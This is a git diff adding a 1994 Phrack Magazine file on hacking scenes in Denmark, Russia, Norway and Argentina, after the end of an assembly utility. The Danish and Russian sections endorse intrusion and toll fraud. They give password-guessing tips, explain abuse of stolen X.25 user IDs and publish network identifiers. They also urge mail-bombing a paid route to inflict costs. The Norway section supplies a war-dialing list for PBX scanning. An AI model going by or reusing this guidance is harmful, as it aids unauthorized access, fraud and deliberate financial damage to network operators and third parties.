+usage   db 'Usage: CONVERT logfile outfile',10,13
+ db 10,13
+ db '       logfile - Keytrap',27h,'s scancode data.',10,13
+ db '       outfile - Specify an output file name.',10,13
+ db 10,13,'$'
+
+ferr    db 'WARNING: Problem with one of the files.',10,13
+ db 10,13,'$'
+
+;------------------------------------------------------------------------------
+
+eof     db 0
+ end start
diff --git a/phrack46/27.txt b/phrack46/27.txt
new file mode 100644
index 0000000..3daf2dc
--- /dev/null
+++ b/phrack46/27.txt
@@ -0,0 +1,1415 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 27 of 28
+
+****************************************************************************
+
+                             International Scenes
+
+There was once a time when hackers were basically isolated.  It was
+almost unheard of to run into hackers from countries other than the
+United States.  Then in the mid 1980's thanks largely to the
+existence of chat systems accessible through X.25 networks like
+Altger, tchh and QSD, hackers world-wide began to run into each other.
+They began to talk, trade information, and learn from each other.
+Separate and diverse subcultures began to merge into one collective
+scene and has brought us the hacking subculture we know today.  A
+subculture that knows no borders, one whose denizens share the common goal
+of liberating information from its corporate shackles.
+
+With the incredible proliferation of the Internet around the globe, this
+group is growing by leaps and bounds.  With this in mind, we want to help
+further unite the communities in various countries by shedding light
+onto the hacking scenes that exist there.  If you want to contribute a
+file about the hacking scene in your country, please send it to us
+at phrack@well.com.
+
+This month we have files about the scenes in Denmark and Russia, updates
+from Australia and Argentina, and a scan of Norway's toll-free exchange.
+
+________________________________________________________________________________
+
+
+                  The Computer Underground in Denmark
+
+
+Dear Phrack Readers, what follows is a little about the Danish
+computer underground, focusing on the hacking/phreaking scene.
+
+A little introduction:
+
+Even though Denmark itself is little country, with a little over 5 million
+citizens, an active computer underground community thrives upon the growing
+network links and computer systems which in these days seems to pop up all
+over country.
+
+The history of the hacking community in DK is not very old, but since the
+first Danish hackers appeared some 5 years ago, there has been increasing
+hacking activity, bringing on a history of busts, paranoia and times of war;
+but also a history of great friendships, supremacy over the corporate machine,
+and a process of learning more about the world we live in. But before we take
+a look at the networks, boards and the community itself, let's go back in time,
+and find the place where it all started.
+
+The Past:
+
+The first hackers to appear in DK was JubJub Bird and Sprocket, two high
+school students which broke into 100's of computers world wide. At that time
+there was no H/P scene in DK, no boards, no HP networks and no fellow hackers.
+Nevertheless, JubJub's role in the Danish HP history plays a key role. JubJub
+got busted early January '90, after being discovered in some of NASA's non
+public machinery, and being under surveillance for a period of time. This was
+the beginning of what was to become the Danish hacking scene. JubJub and
+Sprocket never got a sentence, since the court had absolutely no idea of how
+to handle a case like this. The court sat down a period of 2 years, and if
+JubJub or Sprocket was caught in hacking within that period they would
+get a verdict.
+
+Anyway, after the bust of JubJub and Sprocket, the first stirs of hackers
+appeared and began to expand like rings in water. And suddenly we had a growing
+happy hacking community. Hackers from all over the country gathered at newly
+started 'HPA only boards' which was a rarely seen thing among the sea of WaReZ
+boards. One of the coolest boards was Fantasia, the headquarters of MoTIGoL,
+which was being run by Netrunner. Fantasia was the largest in Denmark, maybe
+even in Scandinavia, and had callers from all over the world. At that time,
+nobody was afraid of getting busted, and A LOT of BlueBoxing, X25, and general
+hacking on Inet was done. But one day all that changed.
+
+During the winter '91 DIKU (Institute of computer science, Copenhagen
+university) was used as a meeting place of hackers. A lot of novice hackers
+used the machines to learn about Internet and UNIX in general, skating through
+the internet, trading info, chatting at IRC and stuff like that. What nobody
+knew was that Jgen Bo Madsen, security expert and high paid consultant
+working for UNI*C, was monitoring all traffic from and off DIKU, with evil
+intentions of busting! The law enforcement specter was soon to cast its dark
+shadow on the whole of the Danish scene.
+
+It all ended one winter afternoon. I remember turning on the TV, not really
+paying attention to the news, reading a book or so, when suddenly the news
+lady starts speaking about how the secret service is soon to unravel the biggest
+hacker conspiracy ever in Denmark, one hacker was already arrested and 10 more
+would be arrested in near future. Saron was the one who got busted. He had used
+an x25 datapak link, which normally only was used for electronic mail, to
+access DIKU, coming in from a German PAD to make tracing harder, but also
+making a hell of a big bill for the stolen NUI's owner. Anyway, it came out
+that JBM (Jgen Bo Madsen) had traced 76 calls to DIKU, and had monitored the
+breakins of computers in Greece, Brazil, Mexico and USA.
+
+At that moment the entire scene more or less panicked. Most dudes moved
+their precious machinery out of the house and all boards closed down.
+A period of isolation began. The SysOp of Fantasia, Netrunner pulled out his
+harddisk hiding it somewhere out of reach, if JBM and his secret service
+buddies should show up.
+
+No more busts happened and people calmed down after a month or so. Everybody
+knew that things wouldn't be the same after the DIKU incident. Netrunners
+harddisk broke down after he had reinstalled it, because all the dirt it
+had consumed from 2 years constant running, was too much for the thing to
+handle when it was powered back on. So, Fantasia closed and the underground
+network PhoenixNet also closed when it came out that JBM had infiltrated
+the net. An era was over, and a new was to begin.
+
+
+The Present:
+
+Today's scene is doing quite good. It has became harder in a way, more
+careful and more closed than ever. But still, we have open boards
+and a public network. FOOnet which focuses on computer security and is
+used as an forum open for discussions. Mostly by hackers and people into
+computer security in general, but every once in awhile JBM and Sysadm's
+drop by too. Also, the Danish scene is proud to release CrackerJack, made by
+Jackal, which we still claim is the fastest UNIX passwd cracker available for
+PC. Not that cracking passwd files is a major element in hacking, but its nice
+to have a fast cracker every once in awhile :)
+
+The Danish computer underground scene is filled with WaReZ boards,
+but only a few real H/P/A boards are running. Boards like Free Speech Inc.
+and Freeside are places where the Danish hackers hang out. None of these
+boards are public, but JBM is quite aware of them and had once infiltrated
+Freeside, even though it was clearly stated that the bbs was private and
+no one related to any gov agencies was allowed to use the board. So, JBM
+is actually doing what he has accused us for over the years, which is
+intruding people's privacy.
+
+Other than FOOnet, there is a few other networks, such as SDC which
+once had a good mail flow in the hacking conferences, but today more
+is turning into a demo/warez net. A few other truly H/P nets are running
+successful with a good mail flow, but those shall remain anonymous in
+this article.
+
+The links from the Danish scene to fellow hackers around the world is
+very good. Due to numerous nights spent at QSD, connections is established
+to a lot of dudes in Brazil which frequently drops by Free Speech Inc. and
+Freeside, dudes in UK as well as fellow hackers in US like Alby/Empire.
+
+Okay, this is it. The section about hacking in Denmark. The stuff
+that you had to read all the above boring shitty sentimental stuff,
+to get to!!
+
+
+Hacking in Denmark:
+
+The two main networks in DK which is used for hacking and meeting fellow
+hackers are, (of course) Internet and the X25 datapak link. Internet is
+accessible via all Universities like diku.dk, daimi.aau.dk, auc.dk and so on.
+(Nobody uses DIKU anymore though). The university is doing a brave struggle
+to keep the hackers out by upgrading to C2 passwd security, meaning that
+passwds must be at least 8 chars, contain 1 uppercase and 1 non alphabetic
+char.
+
+The upper level of the top 10 of chosen C2 security passwd's goes something
+like: q1w2e3r4*, a1s2d3f4*, these do not contain any uppercase chars and
+therefore should not have been accepted as a passwd by the system, but
+apparently the C2 software finds them secure. Also, a nice thing to do is
+taking your wordlist and using Therion's Passwd Utility, TPU which is a word
+list manipulator, and add a 1* to all words in the list and uppercase the first
+letter. Gives a lot of accounts.
+
+Another popular thing, in order to keep hackers out, is to setup a so-called
+'modem security password' on all dialups. So when you call up the system,
+before you ever get to the server you have to enter a password. And if you get
+through, not all accounts are cleared to use the modem dialup facilities,
+and unless you've got your sleazy hands on a cleared account, you get the boot.
+
+Even though the universities puts such a great effort into keeping
+hackers out, they aren't doing very good. In fact, they are doing real
+bad. A legit account costs appr. 1900 dkr, which is about a little over
+300$ US., which goes into the pockets of UNI*C, so its no wonder that
+we like to use the nice free facilities present at the universities.
+
+Other ways to get on Internet, are via other machines under the ministry
+of education and certain private and government systems. It's surprising
+how many bugs (that we all know of) in certain UNIX versions, that still
+have not been patched, and therefore leave the systems wide open.
+This goes not only for Denmark, but generally throughout machines on Internet
+in Europe. Also, a well known phenomena in DK throughout the sector of
+private corporation computer systems, is lousy security. Elementary
+stuff like bad file permissions, left over suid shell scripts, and
+open guest accounts are everywhere.
+
+Regarding the X25 datapak links. The official Danish PAD can be
+reached at dialup 171. This is totally free number just like 80xxxxxx
+are, which doesn't affect your phone bill. Keep in mind that all calls made in
+DK are billed, even local calls within same city are charged, and charged
+high! I remember a time when I was kind of addicted to a certain MUD. For one
+month alone I got a bill on 1800 dkr, appr. 300 US$! So, the 171 X25 link is
+nice thing, since all calls are billed to the owner of the Network User Id
+(NUI) and NOT on your phone bill.
+
+However, X25 can be a dangerous thing to use. Especially if you only
+have a single NUI to use. The phone company is having some trouble tracing
+the 171, but all calls made in DK on digital lines are logged. So, when
+some corporation gets a bill on, say 2-3000$ or an amount much higher
+than usual, the phone company can compare the logs on who dialed 171,
+to the X25 logs, on which date and time the NUI in question was abused,
+and figure out who abused the NUI. On analog lines the logging is
+harder to do, and only goes back a month or so. The format of the NUIs
+consist of a user number and a password. The first char indicates
+either a K or J, depending on the NUI's owner, either located under KTAS
+or JTAS districts. Jutland is covered by JTAS and Copenhagen Sjlland,
+by KTAS. Then follows 7 or 8 numbers and usually a word of 7-8 chars. Like,
+K0100872DKDIANEC, this is a valid NUI open for public use by everybody,
+but its restricted to only to connect to a specific system. Sum lame
+menu database thing. Most NUI's allows access to most computers, world
+wide on the X25 network, by an NUA (network User Address). The most use
+of X25 is to gain free access to Internet by connecting to a PAD which
+allows telnet. Most of the telnet PAD's has been closed recently because
+of an increasing (ab)use. However, there is still sites like isosun-t.
+ariadne.gr which carries an X25 PAD, and because the sysadm there comes off
+like a dick and is a jerk I'll give u all his NUA. Its 020233181282010. Also,
+check out gw.sdbs.dk, carries a 9k6 x25 link as well as normal Inet axx.
+
+
+A few people to mention, who either has or is playing an important
+part of the Danish hacking community:
+
+JubJub Bird, Sprocket, Saron, Ravan, Netrunner / Sense/NET, Descore, WedLock,
+Le Cerveau, Parrot-Ice, Jackal, Temp, Therion, and myself I guess... :)
+
+If u like, check out:
+
+Free Speech Inc. (+45) 4 582 5565  SysOp: NiteCrawler
+Freeside         (+45) 3 122 3119   -"- : Descore  (Off. CJ Dist. site.)
+
+This is it. Hope u enjoyed this little file. We are always happy to
+meet foreign hackers, so call one of the above boards and lets exchange
+accou.. ehh... intercultural hacking research information :)
+
+-----------------------------------------------------------------------------
+
+
+               Why would you or why wouldn't you want
+              to hack in the ex-USSR or in other words
+                  what the hell do we do up here.
+
+                By Digital Empiror and Stupid Fucker
+
+Russia is a great country, with absolutely no laws against hacking or
+phreaking, both are very easy to do and get away with. It's for that
+reason, that most of the famous online services like CompuServe and Delphi
+closed registrations coming out of the biggest country in the world via
+SprintNet, (you guys think we still can't get in? ... take that as a hint).
+If some great telephone company installed a payphone that can charge calls
+onto a credit card (very rare in this country) then we can use it as well,
+credit card numbers are not hard to compile, especially if you know that
+it is not really illegal. What about those great cellular telephones, you
+know, we love to use those for free, (can't you guys get it? we know that
+we are pain in the ass, but LIVE WITH IT!).
+
+Most of our switchboards in Russia are very ancient, screwed up
+relay-analog switches, they don't have methods for protocol-ing
+telephone calls and present undependable methods for identifying telephone
+numbers. Also there is special equipment which allows making it impossible
+to detect your phone number, or even making detection equipment mistake your
+phone number. Interstate switchboards have to have special methods of
+detecting your phone number, which are of course only accessible to
+Interstate switchboards and not to the rest of commercial companies. There
+was a case once were SprintNet caught one of our great hackers, but he had
+sent them to his great grandfather's (wanna try doing that with the
+FBI?) because as he said 'You can't really be sure that it was really ME
+calling since in this country you can't rely on your number detection
+equipment...'
+
+Another great thing is how the networks are set up in Russia. The greatest
+and the biggest X.25 network is of course SprintNet (for which they have to
+pay of course, if not them then somebody else...), it's a little slow here,
+but that's OK. The administrators who set up the PADs are very lame and
+stupid, and of course can't set up their PADs like SprintNet would want
+them to. They can, for example, they were setting up their PAD so, that it
+would let you connect with virtually ANY system without asking for a NUI,
+and even when they detected, that hackers do it, they couldn't do anything
+besides changing their PAD instead of just changing one register!
+
+Besides that, their is no problem with finding a NUI for Russian X.25
+networks, most of them don't support collect calls like SprintNet, so most
+Russian services that would like their customers to access their service
+via X.25 give the users a unique NUI, that specifies that they can only
+access THIS service, but they usually forget to set it up right so the
+stupid customers like another of our great hackers, will instead of getting
+charged for the service, go to an outdial and call his favorite BBS in
+Clearwater, FL for an example (do they have boards there?).  I don't know
+if you like to access CitiBank machines from SprintNet, but we love to do
+stuff like that.  For example, recently we found a lone standing computer,
+I don't think the guys in CitiBank really understood what they were doing
+when they left their modem setup option on that machine without a password,
+it was a pleasure to change their modem strings knowing that it's absolutely
+legal to do so and nobody has even a right to call about it!  Also there
+are Internet providers in Russia, only two, from which only one is
+interesting - RELCOM!  Most of Internet in Russia is done via UUCP and
+costs a bundle of money, so if I am in a bad mood, I'll drop 10-20 megs of
+mail into an address that doesn't exist, and will laugh and you know why?
+In RELCOM, everybody pays the central router - KIAE.SU, so if you send megs
+of stuff, it will go through a lot of systems that will have to pay first
+each other then to KIAE.SU, but there will be THE last system, that will
+say 'ya know? there is no such address!', so then the trouble will start.
+So if you are in a bad mood, then please, do us a favor, drop a gig or 2 to
+machine that does not have an IP address, better for it to go via a few of
+those machines, for example, to be original:
+
+kaija.spb.su!arcom.spb.su!<any machine in USA>!kiae.su!kaija.spb.su!root
+
+I am sure if you have NSLOOKUP, you can be original and make your best
+route via a dozen systems. When doing it, you can be sure, that it will
+call a lot of arguments from every one of that dozen concerning to who will
+pay for that gig (1mb of mail in Russia costs $50 - $150, that enough money
+for poor Russian Internet hosts).
+
+It's all really great, but we are all on our own, and are not organized into a
+group.  There are not many of us and we are not known by any of our western
+colleagues, to contact us, mail us at:
+
+        an58736@anon.penet.fi
+
+-----------------------------------------------------------------------------
+                        PhreeFone Numbers in Norway
+                     Research and Norwegian Edition by
+
+                          cyber aktiF (01-Feb-94)
+
+               English Translation by Codex/DBA (26-Apr-1994)
+-----------------------------------------------------------------------------
+
+DISCLAIMER: The author of this document takes no responsibility as to how
+            the information herein is used. I hope everyone who uses this
+            information use it for inquisitive purposes only, and don't
+            use it for ANY destructive purposes whatsoever.
+
+WARNING:    Unauthorized use of PBX and other communications equipment
+            owned by others, be it private or business, is illegal and may
+            result in banishment from the Norwegian telephone company (Tele-
+            verket) and/or punishment by law.
+
+                                     ---
+
+After many sporadic travels over the phone network, in other words scanning
+the number region 800 3xxxx, I've come across several interesting things. I
+therefore thought it was in its right place to make a complete list of which
+numbers have a carrier and which have not. The carriers only apply to modems.
+Televerket has (currently) allocated the region 800 30000 to 800 3500 for
+these services.
+
+These lines are 100% phreefone, which means that the owner of these services
+pays for the conversation plus a surcharge per unit. This allows for long
+permutations of numbers and passwords without adding to your own phone bill.
+On the other hand, the owner of the line will have a phonebill which equals
+American Express's.
+
+Televerket and/or the company/person supplying the service(s) have NO problem
+finding out what the caller's number is. This is regardless whether or not
+you have filled in the "don't reveal my number to those I call" part of
+Televerket's connection form/document. Therefore, nosing around these numbers
+should be done with some care.
+
+I haven't tried blueboxing 800 numbers (too much work for something which is
+free in the first place), but theoretically it is possible. [Codex: Would
+this lessen the number identification risk?]
+
+I had severe difficulties with a number which answered with an 1800Hz tone
+in 1 second, after which it became silent. This box phoned me in intervals
+of 5 minutes from 12:00 the next day -- in other words, an automatic
+WarDial :/. If you discover the same problem, the following solution is
+a guaranteed success: Program your local trunk to send all incoming calls
+to ANOTHER number which answers with an 1800Hz tone. Let this be active an
+hour's time, and you should be rid of it.
+
+                                 - MODEM -
+
+The list of numbers where modem carriers are commented with a single line. I
+haven't (at the time of writing) done a deeper investigation of any of the
+services, so none of them should be inactive.
+
+There are several interesting things -- especially the gateways and the
+X.25 PAD. Please note that the security at most of the systems are pretty
+good. Obscure terminal types, data locks and systems which won't identify
+themselves are the most common types. Someone has done a good job in making
+the system safe from unauthorized sources. However, as said before,
+phreefone numbers can be exposed to attacks and permutations of zimmering
+quantities.
+
+When I had a look at the unidentified services, the best way to connect was
+using a raw-mode tty which won't accept special characters. If you run a
+cooked-mode terminal, the text will become even more unreadable.
+
+-- Modem carrier tones ------------------------------------------------------
+
+80030004 - Data Lock (1)
+80030010 - *no output*
+80030067 - *no output*
+80030068 - Courier ASCII Dev. adapter
+80030078 - Courier ASCII Dev. adapter
+80030095 - Modem Outdial (password)
+80030115 - *no output*
+80030130 - *uknown*
+80030180 - *uknown*
+80030225 - *no output*
+80030301 - *no output*
+80030404 - *unknown* - prompts @ter
+80030456 - *unknown* - terminal
+80030485 - *unknown*
+80030456 - Data Lock 4000 (1)
+80030514 - garbage - password
+80030606 - *no output*
+80031040 - *no output*
+80031065 - *no output*
+80031315 - IBM Aix v3 RISC system/6000 (2)
+80031470 - garbage
+80031490 - Dr V.Furst. Med. Lab
+80031666 - prompts - @ter
+80031815 - prompts - <
+80031920 - *unknown* - password
+80031950 - *unknown* - hangup after 5 seconds
+80032165 - Dr V.Furst. Med. Lab
+80032340 - *uknown*
+80032410 - Wangvs VAX/VMS
+80032470 - *no output*
+80032480 - Perle Model 3i - V 02.00G - Apotekernes F. Innkj
+80032590 - *unknown* - password
+80032635 - *unknown* - terminal
+80033338 - TSS Gateway (3)
+80033443 - *no output*
+80033490 - *no output*
+80033580 - *unknown* - hangup after 5 seconds
+80033601 - *no output*
+80033620 - TIU Gateway (3)
+80033720 - *no output*
+80033815 - *unknown* - hangup after 5 seconds
+80033914 - *unknown* dumps lots of texts [Codex: What type?]
+80034248 - *unknown* - prompts for login
+80034866 - X.25 PAD
+
+(1) DATA LOCK
+    If someone can get into one of these, he/she can look forward to getting
+    a Nobel prize. Data locks are modem front-end protectors, almost
+    impossible to crack without physical access.
+
+(2) IBM AIX
+    AIX is one of the best flavors of UNIX there is (even though it was
+    made by IBM) -- unfortunately the security at this site was so terrible
+    that anyone with a minimal knowledge of UNIX and access to this machine
+    could pull it apart blindfolded (making the life really unpleasant for
+    the estate agents who own the LAN. Write me for an account ;).
+
+(3) GATEWAYS
+    Free internet access within grasping distance if you can break through.
+    Not easy, but possible. ;) I am already working on it, so I'm not sure
+    how long it will take until they increase the security.
+
+[Codex: Comment about Study-By-Byte removed, as I didn't know what to call
+the school in English ;). Another fact was that since no number was provided,
+and little seemed to be gained by access to this site anyway, I figured it
+wasn't too important. Get hold of cyb3rF is you really think it's needed.]
+
+-- End of modem carrier listing ---------------------------------------------
+
+                              - VOICE/PBX/FAX -
+
+Here, ladies and gentlemen, is the list of all the phones in the 800 3xxxx
+region which answer. Which is what, I'll leave up all you people out there.
+I have mapped some of the list, but won't spread it [Codex: Yet? ;)].
+
+Only one number per line is noted down. This is to easy the job for everyone
+who's going to (and you will try ;) run these numbers through their scanner
+scripts on the lookout for PBX's and other oddities.
+
+Good luck guys!
+
+cyber aktiF - 01/02/94
+
+-- Answering 800 3xxxx services ---------------------------------------------
+
+80030000
+80030001
+80030002
+80030003
+80030005
+80030006
+80030007
+80030008
+80030009
+80030011
+80030012
+80030014
+80030015
+80030016
+80030017
+80030018
+80030019
+80030022
+80030023
+80030024
+80030025
+80030027
+80030028
+80030029
+80030030
+80030032
+80030033
+80030035
+80030036
+80030037
+80030043
+80030044
+80030045
+80030046
+80030048
+80030050
+80030051
+80030053
+80030055
+80030057
+80030058
+80030060
+80030065
+80030066
+80030070
+80030071
+80030072
+80030073
+80030074
+80030075
+80030077
+80030080
+80030082
+80030088
+80030094
+80030096
+80030097
+80030098
+80030099
+80030100
+80030101
+80030102
+80030103
+80030105
+80030106
+80030110
+80030111
+80030113
+80030114
+80030116
+80030120
+80030131
+80030136
+80030140
+80030144
+80030151
+80030155
+80030160
+80030166
+80030170
+80030171
+80030175
+80030177
+80030189
+80030190
+80030195
+80030199
+80030200
+80030202
+80030203
+80030205
+80030210
+80030211
+80030212
+80030213
+80030215
+80030222
+80030227
+80030230
+80030233
+80030235
+80030239
+80030250
+80030255
+80030258
+80030260
+80030265
+80030270
+80030275
+80030277
+80030288
+80030290
+80030294
+80030295
+80030297
+80030299
+80030300
+80030302
+80030303
+80030305
+80030306
+80030308
+80030310
+80030311
+80030313
+80030315
+80030318
+80030319
+80030322
+80030323
+80030330
+80030333
+80030336
+80030337
+80030340
+80030344
+80030345
+80030355
+80030360
+80030363
+80030366
+80030377
+80030380
+80030388
+80030390
+80030395
+80030400
+80030401
+80030407
+80030408
+80030411
+80030415
+80030420
+80030422
+80030433
+80030440
+80030445
+80030450
+80030452
+80030466
+80030470
+80030472
+80030475
+80030480
+80030488
+80030490
+80030495
+80030500
+80030501
+80030502
+80030511
+80030520
+80030522
+80030531
+80030540
+80030545
+80030550
+80030555
+80030560
+80030565
+80030566
+80030570
+80030571
+80030580
+80030585
+80030600
+80030601
+80030603
+80030600
+80030601
+80030603
+80030610
+80030616
+88030640
+80030650
+80030666
+80030670
+80030680
+80030683
+80030690
+80030700
+80030701
+80030707
+80030725
+80030730
+80030750
+80030770
+80030777
+80030788
+80030800
+80030803
+80030811
+80030828
+80030830
+80030840
+80030844
+80030850
+80030855
+80030860
+80030866
+80030870
+80030875
+80030880
+80030888
+80030889
+80030890
+80030900
+80030906
+80030910
+80030911
+80030915
+80030920
+80030922
+80030930
+80030940
+80030950
+80030955
+80030959
+80030960
+80030975
+80030990
+80030994
+80031000
+80031001
+80031006
+80031007
+80031008
+80031010
+80031020
+80031030
+80031031
+80031043
+80031044
+80031048
+80031055
+80031058
+80031060
+80031064
+80031066
+80031070
+80031075
+80031080
+80031082
+80031085
+80031092
+80031097
+80031103
+80031108
+80031110
+80031111
+80031112
+80031113
+80031122
+80031123
+80031140
+80031144
+80031150
+80031151
+80031155
+80031160
+80031166
+80031180
+80031188
+80031200
+80031210
+80031211
+80031212
+80031220
+80031221
+80031229
+80031230
+80031231
+80031234
+80031240
+80031241
+80031244
+80031250
+80031255
+80031266
+80031288
+80031290
+80031300
+80031306
+80031310
+80031313
+80031318
+80031336
+80031340
+80031343
+80031344
+80031355
+80031360
+80031366
+80031400
+80031404
+80031410
+80031412
+80031420
+80031422
+80031430
+80031440
+80031441
+80031447
+80031455
+80031460
+80031466
+80031510
+80031535
+80031540
+80031545
+80031550
+80031560
+80031566
+80031570
+80031571
+80031580
+80031590
+80031600
+80031606
+80031610
+80031611
+80031620
+80031630
+80031631
+80031640
+80031660
+80031661
+80031680
+80031688
+80031690
+80031700
+80031701
+80031707
+80031713
+80031717
+80031740
+80031760
+80031777
+80031780
+80031800
+80031801
+80031809
+80031811
+80031820
+80031830
+80031831
+80031833
+80031840
+80031850
+80031851
+80031866
+80031880
+80031888
+80031900
+80031907
+80031919
+80031927
+80031937
+80031947
+80031957
+80031958
+80031959
+80031970
+80031994
+80031995
+80031999
+80032000
+80032001
+80032002
+80032005
+80032008
+80032011
+80032020
+80032032
+80032040
+80032062
+80032066
+80032080
+80032092
+80032101
+80032105
+80032113
+80032123
+80032130
+80032140
+80032144
+80032150
+80032152
+80032155
+80032166
+80032173
+80032176
+80032200
+80032202
+80032210
+80032212
+80032220
+80032222
+80032223
+80032225
+80032232
+80032255
+80032280
+80032320
+80032323
+80032325
+80032330
+80032332
+80032333
+80032350
+80032355
+80032383
+80032390
+80032399
+80032400
+80032412
+80032415
+80032420
+80032424
+80032425
+80032432
+80032444
+80032450
+80032455
+80032460
+80032466
+80032500
+80032511
+80032520
+80032525
+80032530
+80032540
+80032550
+80032555
+80032560
+80032565
+80032571
+80032578
+80032600
+80032639
+80032660
+80032666
+80032668
+80032680
+80032690
+80032750
+80032754
+80032808
+80032820
+80032832
+80032850
+80032875
+80032880
+80032899
+80032900
+80032907
+80032927
+80032987
+80032990
+80032997
+80033000
+80033003
+80033011
+80033013
+80033016
+80033300
+80033301
+80033302
+80033303
+80033304
+80033305
+80033306
+80033310
+80033311
+80033312
+80033313
+80033315
+80033317
+80033318
+80033320
+80033321
+80033322
+80033325
+80033330
+80033331
+80033332
+80033333
+80033334
+80033335
+80033341
+80033345
+80033350
+80033353
+80033355
+80033370
+80033372
+80033373
+80033377
+80033380
+80033383
+80033385
+80033394
+80033399
+80033410
+80033411
+80033420
+80033432
+80033433
+80033440
+80033444
+80033445
+80033448
+80033450
+80033455
+80033456
+80033460
+80033466
+80033477
+80033488
+80033499
+80033500
+80033505
+80033510
+80033515
+80033520
+80033535
+80033540
+80033550
+80033555
+80033566
+80033567
+80033570
+80033577
+80033585
+80033590
+80033600
+80033610
+80033611
+80033616
+80033622
+80033626
+80033630
+80033633
+80033644
+80033650
+80033655
+80033660
+80033666
+80033670
+80033678
+80033690
+80033711
+80033717
+80033730
+80033733
+80033740
+80033760
+80033770
+80033775
+80033777
+80033779
+80033780
+80033788
+80033800
+80033808
+80033810
+80033818
+80033820
+80033833
+80033838
+80033840
+80033844
+80033855
+80033856
+80033860
+80033866
+80033880
+80033888
+80033890
+80033899
+80033900
+80033920
+80033930
+80033933
+80033940
+80033950
+80033960
+80033970
+80033977
+80033980
+80033990
+80033994
+80033999
+80034000
+80034011
+80034020
+80034022
+80034024
+80034025
+80034030
+80034033
+80034034
+80034035
+80034040
+80034043
+80034044
+80034050
+80034055
+80034070
+80034077
+80034080
+80034088
+80034090
+80034100
+80034110
+80034111
+80034115
+80034123
+80034125
+80034134
+80034135
+80034140
+80034144
+80034150
+80034155
+80034160
+80034166
+80034170
+80034180
+80034210
+80034220
+80034222
+80034240
+80034250
+80034260
+80034266
+80034270
+80034880
+80034888
+80034889
+80034910
+80034966
+80034988
+80034999
+80035000
+
+-- End of list of answering 800 3xxxx services ------------------------------
+
+This file was brought to you in English by Codex/DBA, 26-Apr-1994. I didn't
+ask cyb3rF for permission to translate this document, but I hope he won't
+mind. I also understand that the document is of varied use to some people
+(those of you who can't dial in free to Norway (cc 47), don't bother), but I
+thought any information, however useful might be of some interrest to the
+English speaking crowd out there.
+
+Re: cyb3rF, Sicko, BattleAng, Maelstrom, Uridium, Enigma, Golan, BadS, vale_
+    and any other people I've forgotten to mention right now (flame me on
+    #phreak, guys ;).
+
+I'll be back in Norway in June.
+
+                                                      Codex/DBA, 26-Apr-1994.
+-- "Men I haelvete gutar, vaent paa meg!!" ----------------------------------
+
+-----------------------------------------------------------------------------
+
+More about the Argentine Internet scenery.
+
+
+It's difficult to add something to an already good article like Opii's one,
+but here is some info which may interest you besides what you already know:
+
+* The local Net started as late as January 1989, when the National Commission
+for Atomic Power (CNEA) connected to the BITNET network. The three first
+nodes were: ARGCNE (an IBM 9370-60 mainframe), ARGCNEA1 (IBM/370 158),
+and ARGCNEA2 (Comparex 7/68), all running RSCS V1. Release3 for data comm.
+
+The node ARGCNEA2 was (I think it still is) the main link in Argentina to
+Bitnet. Until late 1992, they still used a manual DIAL-UP LINK (!) to the
+Chilean node UCHCECVM (IBM 4341MO2) at the Chile's National University in
+Santiago city, connecting at 9600 bps to exchange mail. I'm not sure about
+if the Chilean link is still working, due to the existing new leased line
+connection of the government's foreign office.
+
+In mid-1990, the national university of La Plata, joined ranks and also
+connected to the Bitnet network. The two nodes, CESPIVM1 and CESPIVM2
+(Running on IBM mainframes) also served as hosts to a VAX 11-780, and a
+experimental link to some computers in Uruguay's (country) national
+University.
+
+Another different beast is what's called the RAN network (National Academic
+Network), which is nothing more than a UUCP network connecting a hundred
+different nodes through the country. Again, until mid-92 they used X.25
+ARPAC connections (!!EXPENSIVE!!) and manual Dial-up calls(!!) for the
+"international" connection into UUCO. More recently (two months ago), they
+have got their own 64kbps leased line to the US, which finally will let
+people around the world to mess and GET into our computers :-).
+
+While the project was to connect to Maryland University (financed by the
+US National Science Foundation, they love us), I still don't know what's the
+host at the other side of the leased line.
+
+Well, that's the end of the FACTS that I have... now some political opinions:
+Things are getting a *little* better, but I don't expect any improvements
+for "Joe average" user, since to make things work, we must get rid off the
+current LD and data monopoly of the two European private telcos that own us.
+Until 1999, they have the exclusive right to use and abuse the market of
+both voice and data transmissions, and no competition can enter without
+passing through their satellite links (and rates). Very nice for a government
+that is always speaking of "free markets".
+
+Until we get AT&T and/or MCI competing for the market, we won't have affordable
+rates, and US companies like CIS, Delphi, etc. than could be doing BIG
+business NOW, will have to wait until late 1999, when the monopoly ends by
+law. (Or, BTW: or they can talk to Mr. Al Gore, so he can kick a little our
+beloved president to end the telcos ripoff).
+
+Chileans, in contrast, have a lot better scene, with well-established direct
+internet links, an X.25 network with 9600bps access through the country, and
+even Gopher servers since a long time ago!.
+
+Following is a quick and dirty list of Internet domains for both Chile and
+Argentina:
+
+ARGENTINA:
+
+ar.ar (unspecified)
+athea.ar (unspecified)
+atina.ar (united nations development programme, argentina) (RAN UUCP HOST)
+ba.ar (unspecified)
+cb.ar (unspecified)
+com.ar (unspecified)
+edu.ar (unspecified)
+gov.ar (government of argentina)   <- give my regards to our corrupt gvt!
+mz.ar (unspecified)
+ncr.ar (national cash register corporation, argentina)
+nq.ar (unspecified)
+org.ar (centro de estudios de poblacion corrientes',)
+sld.ar (unspecified)
+subdomain.ar (unspecified)
+test.ar (unspecified)
+tf.ar (unspecified)
+tm.ar (unspecified)
+buenosaires.ncr.ar (national cash register corporation, buenos aires, arg)
+city.ar.us (unspecified)
+datage.com.ar (unspecified)
+guti.sld.ar (unspecified)
+secyt.gov.ar (unspecified)
+unisel.com.ar (unspecified)
+unlp.edu.ar (universidad nacional de la plata, argentina)
+
+CHILE:
+
+altos.cl (altos chile limiteda. el corregidor, santiago, chile)
+apple.cl (axis calderon, santiago, chile)
+ars.cl (ars innovandi (el arte de innovar), chile)
+bci.cl (unspecified)
+campus.cl (indae limiteda. area de computacion, manuel montt, chile)
+cepal.cl (comision economica para america latina (cepal) santiago, chile)
+conicyt.cl (unspecified) <-- Government education branch
+contag.cl (contagio avda. ricardo lyon, idencia, santiago, chile)
+cronus.cl (familia fuentealba olea, chile) <-- a family with their node!
+difusion.cl (editorial difusion, chile)
+eclac.cl (unspecified)
+epson.cl (epson, chile)
+eso.cl (european southern observatory la silla, la serena, chile)
+frutex.cl (frutexport lota, santiago, chile)
+fundch.cl (fundacion, chile)
+fwells.cl (fundacion wells claro solar, casilla, temuco, chile)
+gob.cl (unspecified)  <--- CHILEAN GOVERNMENT! Send a note to Mr. Pinochet!
